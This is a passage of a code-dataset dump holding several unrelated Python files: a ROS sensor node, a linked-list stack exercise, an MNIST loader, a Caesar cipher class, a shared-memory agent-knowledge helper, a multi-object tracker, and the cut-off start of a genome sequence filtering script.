self.port.readline()\n if status == b\"opened\\n\":\n msg.data = True\n self.eye_publisher.publish(msg)\n else:\n msg.data = False\n self.eye_publisher.publish(msg)\n self.get_logger().info(f\"Eyes are {status}\")\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n main_node = EyeNode()\n\n\n rclpy.spin(main_node)\n\n # Destroy the node explicitly\n # (optional - otherwise it will be done automatically\n # when the garbage collector destroys the node object)\n main_node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"pretty_woman/install/pretty_woman/lib/python3.8/site-packages/pretty_woman/eye_node.py","file_name":"eye_node.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"157571680","text":"# Stack implementation using singly Linked lIst\n# create a Node class\n# Time and Space Complexity:\n\"\"\"The time Complexity for checking,\n a) isEmpty method will be O(n) due to the fact it will check throughout all elements in the Stack list\n b) Push,pop and peek methods will take O(1) time complexity as it just push to the recent spot without passing through\n the whole code.\n c) The size method will take O(n) time complexity due to the factor that it has it has to pass and check all elements\n in a stack and returns the value of total number of elements.\n\n Space Complexity:\n a) The Empty and size method will take O(1) space complexity due to the factors that they don't add anything to\n the Stack but rather checking elements\n b) The peek and pop method will take O(1) space complexity as it removes and peeks but doesn't require any addition\n of the structure of Stack\n c) The push method will take O(n) space complexity in a worst case scenario as it involves requiring an extra space\n every time adding an element to the Stack.\"\"\"\n\n\nclass Node:\n def __init__(self, Linked_List_Data):\n self.data = Linked_List_Data\n self.next = None\n self.prev = None\n\n\n# create a class Stack with Linked list Object\n\nclass Stack:\n def __init__(self, ):\n self.head = None\n\n # method to add element to the stack\n\n def push(self, data):\n if self.head is None:\n self.head = Node(data)\n else:\n new_node = Node(data)\n self.head.prev = new_node\n new_node.next = self.head\n new_node.prev = None\n self.head = new_node\n\n # method to remove an element from a stack\n def pop(self):\n if self.isEmpty():\n return None\n else:\n Node_to_Pop = self.head\n self.head = 
self.head.next\n Node_to_Pop.next = None\n return Node_to_Pop.data\n # if self.head is None:\n # return None\n # else:\n # temp = self.head.data\n # self.head = self.head.next\n # self.head.prev = None\n # return temp\n\n # method to return an top element of the Stack\n def peek(self):\n if self.isEmpty():\n return None\n else:\n return self.head.data\n\n def top(self):\n return self.head.data\n\n # method to return the size of the Stack\n def size(self):\n temp = self.head\n count = 0\n while temp is not None:\n count = count + 1\n temp = temp.next\n return count\n\n # method to check Stack if empty\n\n def isEmpty(self):\n if self.head is None:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n Implementation = Stack()\n Implementation.push(4)\n # print(Implementation.pop())\n # print(Implementation.peek())\n # print(Implementation.size())\n","sub_path":"Week 5/Question_3.py","file_name":"Question_3.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"258828045","text":"import tensorflow as tf\r\nfrom tensorflow.keras.utils import to_categorical\r\n\r\n\r\ndef load_MNIST(one_hot_encoding=True, num_classes=10, load_validation=True, num_validation=5000):\r\n train_sample, test_sample = tf.keras.datasets.mnist.load_data()\r\n (train_x,train_y), (test_x,test_y) = train_sample, test_sample\r\n if load_validation==False:\r\n if one_hot_encoding==True:\r\n train_y = to_categorical(train_y,num_classes=num_classes)\r\n test_y = to_categorical(test_y,num_classes=num_classes)\r\n return (train_x,train_y), (test_x,test_y)\r\n else:\r\n validation_x = train_x[-num_validation:]\r\n validation_y = train_y[-num_validation:]\r\n train_x = train_x[:-num_validation]\r\n train_y = train_y[:-num_validation]\r\n if one_hot_encoding==True:\r\n train_y = to_categorical(train_y,num_classes=num_classes)\r\n test_y = to_categorical(test_y,num_classes=num_classes)\r\n 
validation_y = to_categorical(validation_y,num_classes=num_classes)\r\n return (train_x,train_y), (test_x,test_y), (validation_x, validation_y)","sub_path":"Vision/load_dataset.py","file_name":"load_dataset.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"611033485","text":"class Caesar:\n def __init__(self):\n self.__letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n \n def encrypt(self, texto_plano, key = 3):\n '''(Caesar, str, int) -> str\n \n Retorna o texto_plano cifrado com a cifra\n de Cesar, utlizando a chave key,\n cujo padrao e 3.\n '''\n cipher_text = ''\n texto_plano = texto_plano.upper()\n for ch in texto_plano:\n if ch in self.__letters:\n idx = self.__letters.find(ch) + key\n if idx >= 26:\n idx -= 26\n cipher_text += self.__letters[idx]\n return cipher_text\n \n def decrypt(self, texto_cifrado, key = 3):\n ''' (Caesar, str, int) -> str\n \n Retorna em texto plano o texto_cifrado decifrado\n com a cifra de Cesar, utilizando a chave key,\n cujo padrao e 3.\n '''\n plain_text = ''\n texto_cifrado = texto_cifrado.upper()\n for ch in texto_cifrado:\n if ch in self.__letters:\n idx = self.__letters.find(ch) - key\n plain_text += self.__letters[idx]\n return plain_text.lower()","sub_path":"cesar.py","file_name":"cesar.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424471633","text":"# -*- coding: utf-8 -*-\n\nfrom ctypes import *\nimport DataStructure\nfrom copy import deepcopy\n\n\nclass KnowledgeHolder(object):\n \"\"\"\n 共有メモリ上のAgentの知識、その中のwords,geneなど\n を探索する.\n 特定のAgentIDを検索すると各メソッドの返り値が自動的に\n セットされる.同時に配列のどこまで値が書き込まれているのか\n もチェックする.その位置から書き込みが行われる\n\n また逆にC言語の構造体に書き込む処理も行う.\n\n 注意事項\n 1.基本的に共有メモリは単一のプロセスしかアクセスできない.\n 2.共有メモリは線形探索しかできない(と思う)\n 3.共有メモリ上の構造体にアクセスするときはctypesの仕様で構造体\n のメンバーがそのままコピーされるわけではなく,ラッパーオブジェクト\n が返される.\n 
4.forループゴリ押しで探索しているが、下手に他の関数をかませると\n メモリの別の位置を参照しているみたいだから変えないでね\n \"\"\"\n\n def __init__(self, c_knowledge_array, agent_id):\n self.knowledge_array = c_knowledge_array\n self.agent_id = agent_id\n # print \"c_knowledge_array\", c_knowledge_array\n # print \"self.knowledge_array\", self.knowledge_array\n\n # 発話する単語を選ぶときに使う\n self.activewords = []\n self.inlexicon = []\n\n # word, geneの構造体リストに新しく追加する場合のindex\n self.wordinsert = 0\n self.geneinsert = 0\n\n # ***書き込みの際には利用できない***.インスタンスを作った時点での情報\n # になる.最新版というわけではない\n self.knowledgestruct = None\n self.wordstruct = None\n self.any_wordstruct = None\n self.genestruct = None\n\n for x in self.knowledge_array:\n if self.agent_id == x.id:\n self.knowledgestruct = x # ラッパーオブジェクトを取り出す\n break\n \"\"\"\n for field_name, field_type in self.knowledgestruct._fields_:\n print field_name, getattr(self.knowledgestruct, field_name)\n \"\"\"\n self.wordstruct = self.knowledgestruct.words\n\n def find_agent_knowlede(self):\n \"\"\"\n 指定されたagentの構造体を取ってくる\n \"\"\"\n return self.knowledgestruct\n\n def find_word(self, word):\n \"\"\"\n word は必ず語幹\n agentの構造体から指定されたword構造体をとってくる.\n 持っていない場合はNone\n \"\"\"\n self.word = word\n for i, x in enumerate(self.wordstruct):\n if word == x.stem:\n self.any_wordstruct = x\n\n return self.any_wordstruct\n\n def find_genes(self):\n \"\"\"\n find_wordで見つけたwordのgeneを返す\n 持っていない場合はNone\n \"\"\"\n return self.genestruct\n\n def active_words(self):\n \"\"\"active flagが立っている単語とその頻度\n \"\"\"\n\n self.activewords = [x for x in self.wordstruct\n if x.active != 0]\n self.activewords = [(x.stem, x.freq) for x in self.activewords]\n self.activewords_dict = {}\n\n for s, v in self.activewords:\n self.activewords_dict[s] = v\n return self.activewords_dict\n\n def in_lexicon_words(self):\n \"\"\"stem_in_lexフラグが立っている単語\n \"\"\"\n\n self.inlexicon = [x for x in self.wordstruct\n if x.stem_in_lex != 0]\n\n return self.inlexicon\n\n \"\"\"\n 以下書き込み用の処理\n >>> かならず任意の単語を検索した後でないとエラーになる\n >>> 書き込む可能性があるのはgene, word\n 
>>> 新しい過去形はどうやって保持しておく?\n\n \"\"\"\n\n def insert_gene(self, c_knowledge_array, p_bit_array, score):\n \"\"\"使用した遺伝子配列を構造体に挿入する\n\n Parameters\n ----------\n c_knowledge_array : Shared memory\n\n bit_array : python list(numpy array) like object\n\n score : Int\n\n Returns\n -------\n\n \"\"\"\n for x in c_knowledge_array:\n if self.agent_id == x.id:\n self.wordstruct = x.words # ラッパーオブジェクトを取り出す\n break\n\n for x in self.wordstruct:\n if x.stem == self.word:\n self.genestruct = x.gene\n break\n\n used = 1\n\n c_bit_array = (c_int * len(p_bit_array))(*p_bit_array)\n\n new_gene = DataStructure.GeneStruct(\n c_bit_array,\n score,\n used\n )\n\n for i, x in enumerate(self.genestruct):\n if x.used != 1:\n # 配列のi番目から値を挿入できる\n self.geneinsert = i\n break\n\n self.genestruct[self.geneinsert] = new_gene\n\n def register_utter(self, c_knowledge_array, past_form):\n \"\"\"自分が発話した過去形を登録する\n\n Parameters\n ----------\n c_knowledge_array : Shared memory\n *** Not any agent's id ***\n\n past_form : Str\n\n \"\"\"\n\n for x in c_knowledge_array:\n if self.agent_id == x.id:\n self.wordstruct = x.words # ラッパーオブジェクトを取り出す\n break\n\n for x in self.wordstruct:\n if x.stem == self.word:\n self.utter_array = x.utter\n break\n\n for x in self.utter_array:\n if x.utter == \"0\":\n setattr(x, \"utter\", past_form)\n break\n\n def register_heard(self, c_knowledge_array, past):\n \"\"\"自分が聞いた過去形を登録する\n\n\n Parameters\n ----------\n c_knowledge_array : Shared memory\n *** Not any agent's id ***\n\n past_form : Str\n\n だめ\n buf = (c_char * len(past))(*past)\n buf_ptr = cast(buf, c_char_p)\n print buf_ptr\n \"\"\"\n past_form = past\n\n for x in c_knowledge_array:\n if self.agent_id == x.id:\n self.wordstruct = x.words # ラッパーオブジェクトを取り出す\n break\n\n for x in self.wordstruct:\n if x.stem == self.word:\n self.heard_array = x.heard\n break\n\n for x in self.heard_array:\n # 0の場合は何も入っていない\n if x.heard == \"0\":\n setattr(x, \"heard\", past_form)\n break\n\n def insert_wordstruct(self, 
c_knowledge_array, *args):\n \"\"\"聞いたことがない新しい単語が入ってきた場合に登録する\n\n Parameters\n ----------\n c_knowledge_array : Shared memory\n *** Not any agent's id ***\n\n args : tiple(stem:String, past:String, meaning:Int, freq:Int)\n\n \"\"\"\n\n for x in c_knowledge_array:\n if self.agent_id == x.id:\n self.wordstruct = x.words # ラッパーオブジェクトを取り出す\n break\n\n notsetted_field_value = [\n # Initialize filed value\n 1, # active\n 0, # stem_in_lex\n 0, # past_in_lex\n 1000 # life\n ]\n\n field_value = [x for x in args]\n field_value.extend(notsetted_field_value)\n new_word = DataStructure.WordStruct(*field_value)\n # new_word_address = addressof(new_word)\n\n for i, x in enumerate(self.wordstruct):\n if x.stem is None:\n self.wordinsert = i\n # self.insertaddres = addressof(x)\n # print self.wordinsert\n break\n\n # メモリにバイナリを書き込む方法でもうまく行く\n # ただ共有メモリのシンクロが効いているかわからないから危険\n # memmove(self.insertaddres, new_word_address, sizeof(new_word))\n # この書き込みでもうまくいく\n self.wordstruct[self.wordinsert] = new_word\n\n def overwrite_past_form(self, c_knowledge_array, new_past_form):\n \"\"\"過去形の形を変更刷る場合に呼ぶ\n word構造体のpastだけ書き換える\n\n Parameters\n ----------\n c_knowledge_array : Shared memory\n *** Not any agent's knowledge ***\n\n new_past_form : string\n\n \"\"\"\n\n for x in c_knowledge_array:\n if self.agent_id == x.id:\n self.wordstruct = x.words # ラッパーオブジェクトを取り出す\n break\n\n for i, x in enumerate(self.wordstruct):\n if x.stem == self.word:\n self.wordinsert = i\n # overwrite_target_struct = x\n setattr(x, \"past\", new_past_form)\n break\n \"\"\"\n values = DataStructure.get_fields_value(overwrite_target_struct)\n values['past'] = new_past_form\n new_word = DataStructure.WordStruct()\n\n for field_name, field_type in new_word._fields_:\n setattr(new_word, field_name, values.get(field_name, 0))\n\n\n print \"new_word check\", new_word\n DataStructure.check_fields(new_word)\n self.wordstruct[self.wordinsert] = new_word\n \"\"\"\n def increment_comunicate_count(self, c_knowledge_array):\n 
\"\"\"コミュニケーションした回数\n \"\"\"\n for k in c_knowledge_array:\n if k.id == self.agent_id:\n c = k.communicate + 1\n setattr(k, \"communicate\", c)\n\n def increment_understand_count(self, c_knowledge_array):\n \"\"\"任意の単語の過去形が理解された回数\n \"\"\"\n for k in c_knowledge_array:\n if k.id == self.agent_id:\n w = k.words\n break\n\n for x in w:\n if x.stem == self.word:\n u = x.understand + 1\n setattr(x, \"understand\", u)\n break\n\n def decrement_wordlife(self, c_knowledge_array):\n \"\"\"Holdしているagentのすべての単語のlifeをデクリメントする.\n 最新の共有メモリを使わなければいけないので、必ず共有メモリ\n を受け取ること\n\n \"\"\"\n\n for k in c_knowledge_array:\n if k.id == self.agent_id:\n w = k.words\n break\n\n for x in w[:self.wordinsert + 1]:\n x.life = x.life - 1\n","sub_path":"KnowledgeLookup.py","file_name":"KnowledgeLookup.py","file_ext":"py","file_size_in_byte":10735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"333599986","text":"#!/usr/bin/env python3\nimport os\nimport sys\n\nimport numpy as np\nimport math\nfrom scipy.spatial import distance as dist\nfrom scipy.optimize import linear_sum_assignment\n\n\ndir_to_Tracker=os.path.dirname(os.path.dirname(os.path.dirname( __file__ )))\ndir_to_Scripts = os.path.join(dir_to_Tracker,\"Scripts\") \nsys.path.append(dir_to_Scripts)\n\nfrom agfh import *\n\nclass Object_handler():\n def __init__(self,classNum):\n self.OcclusionLimit = 50\n self.Current = []\n self.Known = []\n self.Lost = []\n self.UID = 0\n self.ClassID = np.zeros(classNum,dtype = int)\n self.CurrentOrder = {\"Class\": 0, \"cx\": 1, \"cy\": 2, \"Start_x\": 3, \"Start_y\": 4, \"End_x\": 5, \\\n \"End_y\": 6, \"Score\": 7, \"Depth_X\": 8, \"Depth_Y\": 9, \"Depth_Z\": 10, \"Time\": 11, \\\n \"Current_listing\": 12} #Tilføjet time and vehicle XYZ\n self.KnownOrder = {\"UID\": 0, \"ID\": 1, \"Class\": 2, \"cx\": 3, \"cy\": 4, \"Start_x\": 5, \"Start_y\": 6, \\\n \"End_x\": 7, \"End_y\": 8, \"Score\": 9, \"Occlusion\": 10, \"Depth_X\": 11, \"Depth_Y\": 12, 
\"Depth_Z\": 13, \\\n \"Time\": 14, \"Current_listing\": 15, \"velocity_x\": 16, \"velocity_y\": 17, \"velocity_z\": 18} #Tilføjet time and vehicle XYZ\n self.LostOrder = {\"UID\": 0, \"ID\": 1, \"Class\": 2}\n self.Dynsta = np.zeros(classNum, dtype=bool) # Dynamic class true, Static class flass (everything is false)\n self.Dynsta[np.array([0,1])] = True # Make person and car (2) dynamic \n self.static_V = 0.5 #1.8km/h\n self.dynamic_V = 400 #10.8km/h\n # [UID, ID, class, cx, cy, Start_x, Start_y, End_x, End_y, Score, Occlusion]\n \n def add(self,Objects):\n if len(Objects) > 0:\n for i in range(0,len(Objects)):\n Start_x = int(Objects[i,0])\n Start_y = int(Objects[i,1])\n End_x = int(Objects[i,2])\n End_y = int(Objects[i,3])\n Score = Objects[i,4]\n Class = int(Objects[i,5])\n Cx = int((Start_x + End_x) / 2)\n Cy = int((Start_y + End_y) / 2)\n #Depth = Objects[i,6]\n DX = Objects[i,6][0]\n DY = Objects[i,6][1]\n DZ = Objects[i,6][2]\n Time = Objects[i,7] #Tilføjet\n Current = ([Class, Cx, Cy, Start_x, Start_y, End_x, End_y, Score, DX, DY, DZ, Time, i]) #Tilføjet time and vehicle\n self.Current.append(Current)\n self.merge()\n self.clear()\n\n def merge(self):\n ############## Case 1 ##############\n # Current == 0\n # Known == 0\n if len(self.Current) == 0:\n if len(self.Known) == 0:\n print(\"Case 1\")\n #print(\"I see nothing, I know nothing, I am nothing\")\n\n ############## Case 2 ##############\n # Current == 0 \n # Known > 0\n # No New Objects are present\n # Add one to all Occlusion values\n else:\n print(\"Case 2\")\n for i in range(0,len(self.Known)):\n self.Known[i][self.KnownOrder.get(\"Occlusion\")] += 1\n self.Known[i][self.KnownOrder.get(\"Current_listing\")] = float(\"nan\")\n\n ############## Case 3 ##############\n # Current > 0\n # Known == 0\n else:\n if len(self.Known) == 0:\n print(\"Case 3\")\n for i in range(0,len(self.Current)):\n self.upgrade(self.Current[i])\n\n ############## Case 4 ##############\n # Current > 0\n # Known > 0\n else:\n 
print(\"Case 4\")\n Unique_Classes = self.Unique_List([row[self.CurrentOrder.get(\"Class\")] for row in self.Current])\n Unique_Known_Classes = self.Unique_List([row[self.KnownOrder.get(\"Class\")] for row in self.Known])\n # For Loop over each Unique Class\n Current_classes = [row[self.CurrentOrder.get(\"Class\")] for row in self.Current] \n Known_classes = [row[self.KnownOrder.get(\"Class\")] for row in self.Known]\n for c in Unique_Classes:\n Current_i = [i for i, x in enumerate(Current_classes) if c == x]\n Known_i = [i for i, x in enumerate(Known_classes) if c == x]\n Current_D = []\n Known_D = []\n Estim_D = []\n Current_Time = [] #tilføjet\n Known_Time = [] #tilføjet\n UsedRow = []\n UsedCol = []\n\n for i in Current_i:\n Current_D.append([self.Current[i][self.CurrentOrder.get(\"Depth_X\")],self.Current[i][self.CurrentOrder.get(\"Depth_Y\")],self.Current[i][self.CurrentOrder.get(\"Depth_Z\")]])\n Current_Time=([self.Current[i][self.CurrentOrder.get(\"Time\")]]) #tilføjet\n\n for i in Known_i:\n Known_D.append([self.Known[i][self.KnownOrder.get(\"Depth_X\")],self.Known[i][self.KnownOrder.get(\"Depth_Y\")],self.Known[i][self.KnownOrder.get(\"Depth_Z\")]]) \n #Estim_x = self.Known[i][self.KnownOrder.get(\"Depth_X\")]+self.Known[i][self.KnownOrder.get(\"velocity_x\")]*(self.Current[i][self.CurrentOrder.get(\"Time\")]-self.Known[i][self.KnownOrder.get(\"Time\")])\n Estim_D.append([self.Known[i][self.KnownOrder.get(\"Depth_X\")]+self.Known[i][self.KnownOrder.get(\"velocity_x\")]*(self.Current[0][self.CurrentOrder.get(\"Time\")]-self.Known[i][self.KnownOrder.get(\"Time\")]), \\\n self.Known[i][self.KnownOrder.get(\"Depth_Y\")]+self.Known[i][self.KnownOrder.get(\"velocity_y\")]*(self.Current[0][self.CurrentOrder.get(\"Time\")]-self.Known[i][self.KnownOrder.get(\"Time\")]), \\\n 
self.Known[i][self.KnownOrder.get(\"Depth_Z\")]+self.Known[i][self.KnownOrder.get(\"velocity_z\")]*(self.Current[0][self.CurrentOrder.get(\"Time\")]-self.Known[i][self.KnownOrder.get(\"Time\")])])\n Known_Time.append([self.Known[i][self.KnownOrder.get(\"Time\")]]) #tilføjet\n\n if len(Known_D) > 0:\n # Select velocity threshold \n if self.Dynsta[c]==False:\n v_thres=self.static_V\n else:\n v_thres=self.dynamic_V\n # Calculate distance between pairs\n D = dist.cdist(np.array(Current_D), np.array(Known_D))\n E = dist.cdist(np.array(Current_D), np.array(Estim_D))\n # Calculate pairs for lowest cost \n #UsedRow, UsedCol = linear_sum_assignment(D)\n UsedRow, UsedCol = linear_sum_assignment(E)\n\n dellist = np.array([])\n for i in range(len(UsedCol)):\n # Calculate velocity of lowest cost pairs\n v_obj = (D[UsedRow[i]][UsedCol[i]])/(np.array(Current_Time)-np.array(Known_Time[UsedCol[i]]))\n # If pair exceed velocity threshold, remove pair\n if v_obj > v_thres:\n dellist = np.append(dellist,i)\n # Remove unwanted pairs\n UsedRow = np.delete(UsedRow,dellist)\n UsedCol = np.delete(UsedCol,dellist)\n \n # Updating Known to match current pairs\n for i in range(len(UsedRow)):\n Row = UsedRow[i]\n Col = UsedCol[i]\n Current_update = self.Current[Current_i[Row]]\n Known_update = self.Known[Known_i[Col]][self.KnownOrder.get(\"UID\")]\n self.update(Current_update,Known_update)\n\n # Adding new points not matched with a known points\n if len(UsedRow) < len(Current_i):\n New_Points = np.delete(Current_i,[UsedRow])\n for i in New_Points:\n self.upgrade(self.Current[i])\n\n # Add Occlusion to lost objects\n if len(UsedCol) < len(Known_i):\n Lost_Points = np.delete(Known_i,[UsedCol])\n for i in Lost_Points:\n self.Known[i][self.KnownOrder.get(\"Occlusion\")] += 1 \n self.Known[i][self.KnownOrder.get(\"Current_listing\")] = float(\"nan\")\n \n \n # Add Occlusion to all classed not found\n Unseen_Classes = Unique_Known_Classes\n for i in Unique_Classes:\n try:\n Unseen_Classes.remove(i) 
\n except ValueError:\n e = ValueError\n for i in Unseen_Classes:\n for j in range(0,len(self.Known)):\n if self.Known[j][self.KnownOrder.get(\"Class\")] == i:\n self.Known[j][self.KnownOrder.get(\"Occlusion\")] += 1\n self.Known[j][self.KnownOrder.get(\"Current_listing\")] = float(\"nan\")\n\n def upgrade(self,Current): #Tilføjet time and vehicle xyz\n ID, UID = self.incID(Current[self.CurrentOrder.get(\"Class\")])\n Known = [UID, ID, Current[self.CurrentOrder.get(\"Class\")], \\\n Current[self.CurrentOrder.get(\"cx\")], Current[self.CurrentOrder.get(\"cy\")], \\\n Current[self.CurrentOrder.get(\"Start_x\")], Current[self.CurrentOrder.get(\"Start_y\")], \\\n Current[self.CurrentOrder.get(\"End_x\")] ,Current[self.CurrentOrder.get(\"End_y\")], \\\n Current[self.CurrentOrder.get(\"Score\")], 0, Current[self.CurrentOrder.get(\"Depth_X\")], \\\n Current[self.CurrentOrder.get(\"Depth_Y\")], Current[self.CurrentOrder.get(\"Depth_Z\")], \\\n Current[self.CurrentOrder.get(\"Time\")], \\\n Current[self.CurrentOrder.get(\"Current_listing\")],0,0,0] \n self.Known.append(Known)\n\n def update(self,Current,Known_update):\n #Matching UID\n for i in range(0,len(self.Known)):\n if Known_update == self.Known[i][self.KnownOrder.get(\"UID\")]:\n Knownrow = i\n self.Known[Knownrow][self.KnownOrder.get(\"velocity_x\")] = (Current[self.CurrentOrder.get(\"Depth_X\")]-self.Known[Knownrow][self.KnownOrder.get(\"Depth_X\")])/(Current[self.CurrentOrder.get(\"Time\")]-self.Known[Knownrow][self.KnownOrder.get(\"Time\")])\n self.Known[Knownrow][self.KnownOrder.get(\"velocity_y\")] = (Current[self.CurrentOrder.get(\"Depth_Y\")]-self.Known[Knownrow][self.KnownOrder.get(\"Depth_Y\")])/(Current[self.CurrentOrder.get(\"Time\")]-self.Known[Knownrow][self.KnownOrder.get(\"Time\")])\n self.Known[Knownrow][self.KnownOrder.get(\"velocity_z\")] = 
(Current[self.CurrentOrder.get(\"Depth_Z\")]-self.Known[Knownrow][self.KnownOrder.get(\"Depth_Z\")])/(Current[self.CurrentOrder.get(\"Time\")]-self.Known[Knownrow][self.KnownOrder.get(\"Time\")])\n self.Known[Knownrow][self.KnownOrder.get(\"cx\")] = Current[self.CurrentOrder.get(\"cx\")]\n self.Known[Knownrow][self.KnownOrder.get(\"cy\")] = Current[self.CurrentOrder.get(\"cy\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Start_x\")] = Current[self.CurrentOrder.get(\"Start_x\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Start_y\")] = Current[self.CurrentOrder.get(\"Start_y\")]\n self.Known[Knownrow][self.KnownOrder.get(\"End_x\")] = Current[self.CurrentOrder.get(\"End_x\")]\n self.Known[Knownrow][self.KnownOrder.get(\"End_y\")] = Current[self.CurrentOrder.get(\"End_y\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Score\")] = Current[self.CurrentOrder.get(\"Score\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Depth_X\")] = Current[self.CurrentOrder.get(\"Depth_X\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Depth_Y\")] = Current[self.CurrentOrder.get(\"Depth_Y\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Depth_Z\")] = Current[self.CurrentOrder.get(\"Depth_Z\")]\n self.Known[Knownrow][self.KnownOrder.get(\"Occlusion\")] = 0\n self.Known[Knownrow][self.KnownOrder.get(\"Time\")] = Current[self.CurrentOrder.get(\"Time\")] #Tilføjet\n self.Known[Knownrow][self.KnownOrder.get(\"Current_listing\")] = Current[self.CurrentOrder.get(\"Current_listing\")]\n\n def clear(self):\n self.Current = [] \n Lost_UID = []\n for i in range(0,len(self.Known)):\n if self.Known[i][self.KnownOrder.get(\"Occlusion\")] == self.OcclusionLimit:\n Lost_UID.append(self.Known[i][self.KnownOrder.get(\"UID\")])\n for i in Lost_UID:\n self.Remove(i)\n \n def incID(self,Class):\n UID = self.UID\n ClassID = self.ClassID[Class]\n self.UID += 1\n self.ClassID[Class] += 1\n return ClassID, UID\n \n def Unique_List(self, List): \n Unique_Entries = []\n for x in List: \n if x not in 
Unique_Entries: \n Unique_Entries.append(x)\n return Unique_Entries\n \n def Remove(self,Lost_UID):\n indexes = []\n for i in range(0,len(self.Known)):\n if self.Known[i][self.KnownOrder.get(\"UID\")] == Lost_UID:\n #Lost_P = self.Known[i]\n UID = self.Known[i][self.KnownOrder.get(\"UID\")]\n ID = self.Known[i][self.KnownOrder.get(\"ID\")]\n Class = self.Known[i][self.KnownOrder.get(\"Class\")]\n Lost = [UID, ID, Class]\n self.Lost.append(Lost)\n indexes.append(i)\n for index in sorted(indexes, reverse=True):\n del self.Known[index]\n\n","sub_path":"src/Tracker/object_handler/src/Object_handler.py","file_name":"Object_handler.py","file_ext":"py","file_size_in_byte":13844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"590795689","text":"#!/usr/bin/python\n\n# Script number:\t\t\t\t3.1\n# File:\t\t\t\t\t\t\t1 of 1\n# Prerequisite script(s):\n# Prerequisite file(s):\n# Description:\t\t\t\t\tFilter and write CDSs in fasta format\n# Output files:\t\t\t\t\tfilter_errors.csv, filter_errors_t4.csv, table_4_genomes_in_list.txt\n\nimport os\nimport sys\nimport imp\nimport time\nimport re\nimport shutil\nfrom datetime import timedelta\nfrom Bio import SeqIO\nfrom Bio.SeqFeature import FeatureLocation, CompoundLocation\nfrom Bio.Seq import Seq\nimport multiprocessing as mp\n\n\n#############\n# Variables #\n#############\n\nscript_name = os.path.basename(__file__)\nscript_description = \"Convert embl file to fasta format. 
Filter genes.\\n\"\n\nembl_directory = \"raw_files/bacteria_raw/\"\noutput_directory = \"outputs/\"\n\ngenome_sorting = output_directory + \"genome_sorting/\"\ngood_genomes = genome_sorting + \"good_genomes/\"\nt4_genomes = genome_sorting + \"t4_genomes/\"\n\noutput_fasta_directory = output_directory + 'genome_extractions/'\noutput_fasta_directory_t4 = output_directory + 'genome_extractions_t4/'\noutput_filter_directory = output_directory + 'gene_filtering/'\n\n\ngenome_list = genome_sorting + 'genome_list.csv'\ngenome_list_t4 = genome_sorting + 'genome_list_t4.csv'\n\noutput_error_file_path = output_filter_directory + 'filter_errors.csv'\noutput_error_file_path_t4 = output_filter_directory + 'filter_errors_t4.csv'\n\noutput_table_4_path = output_filter_directory + 'table_4_genomes_in_list.txt'\n\n#############\n# Functions #\n#############\n\ndef run_in_parralell(input_list, args, function_to_run, required_workers = None):\n\n\t# blank list to hold results\n\tresults = []\n\n\t\"\"\"\n\tSetup multiprocessing\n\t\"\"\"\n\n\t# Determine the number of cpus to use if the number of workers isnt defined\n\tif not required_workers:\n\t\trequired_workers = (mp.cpu_count()) - 1\n\n\t# Split the list you wish to iterate over into smaller chunks that can be parallelised\n\tchunked_input_list = [input_list[i::required_workers] for i in range(required_workers)]\n\n\t# Multiprocessing setup\n\tpool = mp.Pool(required_workers)\n\n\n\t\"\"\"\n\tIterate function over each of the chunked lists\n\t\"\"\"\n\n\tfor i in chunked_input_list:\n\t\tcurrent_args = args.copy()\n\t\tnew_args = [i]\n\n\t\tfor arg in current_args:\n\t\t\tnew_args.append(arg)\n\n\t\tprocess = pool.apply_async(function_to_run, new_args)\n\t\tresults.append(process)\n\n\t\"\"\"\n\tClose the multiprocessing threads\n\t\"\"\"\n\n\tpool.close()\n\tpool.join()\n\n\n\treturn(results)\n\n\n# Create new directory\ndef create_directory(directory_path):\n\n\tif os.path.exists(directory_path):\n\t\tprint ('Directory 
already exists: %s\\n' % directory_path)\n\telse:\n\t\tprint ('Making new directory: %s\\n' % directory_path)\n\t\tos.mkdir(directory_path)\n\n\n# Strictly create new directory (remove it previsouly)\ndef create_strict_directory(directory_path):\n\n\tif os.path.exists(directory_path):\n\t\tprint ('Directory already exists: %s' % directory_path)\n\t\tprint ('Removing directory')\n\t\tshutil.rmtree(directory_path)\n\t\tprint ('Making new directory: %s\\n' % directory_path)\n\t\tos.mkdir(directory_path)\n\telse:\n\t\tprint ('Making new directory: %s\\n' % directory_path)\n\t\tos.mkdir(directory_path)\n\n\n# Get the script descriptions\ndef script_misc():\n\tprint(script_name)\n\tprint(script_description)\n\n\ndef get_accession_list(genome_list_path):\n\n\taccession_list = {}\n\theader = True\n\n\twith open(genome_list_path, 'rU') as genome_file:\n\t\tfor entry in genome_file:\n\t\t\tif header:\n\t\t\t\theader = False\n\t\t\t\tcontinue\n\n\t\t\tentry_splits = entry.split(',')\n\t\t\taccession = entry_splits[3].strip('\\n')\n\t\t\taccession_list[accession] = [entry_splits[0], entry_splits[1], entry_splits[2]]\n\n\treturn accession_list\n\n\ndef get_sequence_from_raw(genome_sequence, cds_location, cds_start, cds_end, cds_strand, operator):\n\n\tcds_location_nice = ''\n\tcds_locations_nice = []\n\n\tif operator == 'join':\n\n\t\tcds_sequence = ''\n\t\tcds_locations_nice = []\n\n\t\tcds_locations = re.findall('(?<=\\{).+(?=})', str(cds_location))[0]\n\t\tcds_locations = cds_locations.split(',')\n\t\tfor location in cds_locations:\n\t\t\tlocation = location.strip(' 